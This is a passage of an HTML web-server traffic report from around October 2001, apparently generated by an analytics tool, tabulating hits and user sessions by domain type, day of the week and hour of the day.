<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Government</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">396</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.94%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Arpanet</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.03%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>42040</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>7495</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<!-- ---- ---- -->
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="ActivityStats"><!--Activity Statistics::Summary of Activity for Report Period--></A>
<!-- WT_H1>Summary of Activity for Report Period</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Summary of Activity for Report Period</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section outlines general server activity, comparing the level of activity on weekdays and weekends. The Average Number of Users and Hits on Weekdays are the averages for each individual week day. The Average Number of Users and Hits for Weekends groups Saturday and Sunday together. Values in the table do not include erred hits.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- ---- ---- -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=2 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>2, 4, 2</WT_TABLE_STATS -->
<!-- WT_NO_COLUMN_TITLES -->
<CENTER><B>Summary of Activity for Report Period</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Summary of Activity for Report Period</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Average Number of <I><B>Users</B></I> per day on Weekdays</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">129</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Average Number of <I><B>Hits</B></I> per day on Weekdays</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">805</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Average Number of <I><B>Users</B></I> for the entire Weekend</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">208</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Average Number of <I><B>Hits</B></I> for the entire Weekend</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">945</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Most Active Day of the Week</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Tue</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Least Active Day of the Week</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Sat</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Most Active Day Ever</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">October 09, 2001</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Number of Hits on Most Active Day</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">7019</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Least Active Day Ever</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">October 26, 2001</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Number of Hits on Least Active Day</TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">29</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
<!-- ---- ---- -->
><HR><P>
</BODY>
<!-- ---- ---- -->
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopBandwidth"><!--Activity Statistics::Summary of Activity by Time Increment--></A>
<!-- WT_H1>Summary of Activity by Time Increment</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Summary of Activity by Time Increment</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section helps you understand the bandwidth requirements of the site by indicating the volume of activity in kilobytes transferred. The table provides various measures of activity by unit of time for the report period (the unit of time depends on the amount of time covered by the report, and will be the day in most cases).<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index12.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopWeekdays"><!--Activity Statistics::Activity Level by Day of Week--></A>
<!-- WT_H1>Activity Level by Day of Week</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Activity Level by Day of Week</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section shows the activity for each day of the week for the report period (i.e. if there are two Mondays in the report period, the value presented is the sum of all hits for both Mondays.) Values in the table do not include erred hits. <!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index13.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Activity Level by Day of the Week</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Activity Level by Day of Week</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Day</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sun</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7303</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.58%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1546</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mon</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9156</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14.52%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1536</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Tue</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16119</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">25.57%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2275</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Wed</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11077</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">17.57%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1610</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Thu</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7033</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.15%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1385</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Fri</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7355</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.66%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1382</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sat</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4983</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.9%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1164</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Weekdays</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>50740</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>80.5%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>8188</B></TD>
</TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Weekend</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>12286</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>19.49%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>2710</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopHours"><!--Activity Statistics::Activity Level by Hour--></A>
<!-- WT_H1>Activity Level by Hour of the Day</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Activity Level by Hour of the Day</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section shows the most and the least active hour of the day for the report period. The second table breaks down activity for the given report period to show the average activity for each individual hour of the day (if there are several days in the report period, the value presented is the sum of all hits during that period of time for all days). All times are referenced to the location of the system running the analysis.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index14.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=2 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>2, 4, 2</WT_TABLE_STATS -->
<!-- WT_NO_COLUMN_TITLES -->
<CENTER><B>Activity Level by Hour of the Day</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Activity Level by Hour</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Most Active Hour of the Day</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">18:00-18:59</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Least Active Hour of the Day</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">05:00-05:59</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, 3, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Activity Level by Hours Details</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Activity Level by Hour</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Hour</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B># of Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B># of User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>00:00-00:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1789</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.83%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">378</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>01:00-01:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1580</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.5%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">316</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>02:00-02:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1400</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.22%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">270</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>03:00-03:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">848</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.34%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">203</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>04:00-04:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">882</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.39%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">212</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>05:00-05:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">765</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">211</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>06:00-06:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1029</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.63%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">264</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>07:00-07:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1697</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.69%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">267</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>08:00-08:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2184</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.46%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">322</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>09:00-09:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3074</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.87%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">479</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10:00-10:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3268</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.18%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">426</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11:00-11:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3310</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.25%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">485</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>12:00-12:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3625</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.75%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">545</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>13:00-13:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4329</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.86%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">514</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14:00-14:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3921</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.22%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">598</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15:00-15:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3579</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.67%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">524</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>16:00-16:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2891</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.58%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">540</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>17:00-17:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3256</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.16%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">596</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18:00-18:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4450</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.06%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">713</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>19:00-19:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3466</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.49%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">689</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20:00-20:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3184</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">666</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>21:00-21:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3554</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.63%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">717</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>22:00-22:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2688</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.26%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">538</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>23:00-23:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2257</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.58%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">425</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Users during Work Hours (8:00am-5:00pm)</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>30181</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>47.88%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>4433</B></TD>
</TR>
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Users during After Hours (5:01pm-7:59am)</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>32845</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>52.11%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>6465</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<!-- ---- ---- -->
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TechnicalStats"><!--Technical Statistics::Technical Statistics--></A>
<!-- WT_H1>Technical Statistics and Analysis</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Technical Statistics and Analysis</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This table shows the total number of hits for the site, how many were successful, how many failed, and calculates the percentage of hits that failed. It may help you in determining the reliability of the site.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<!-- ---- ---- -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=2 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>2, 4, 2</WT_TABLE_STATS -->
<!-- WT_NO_COLUMN_TITLES -->
<CENTER><B>Technical Statistics and Analysis</B></CENTER></TD></TR>
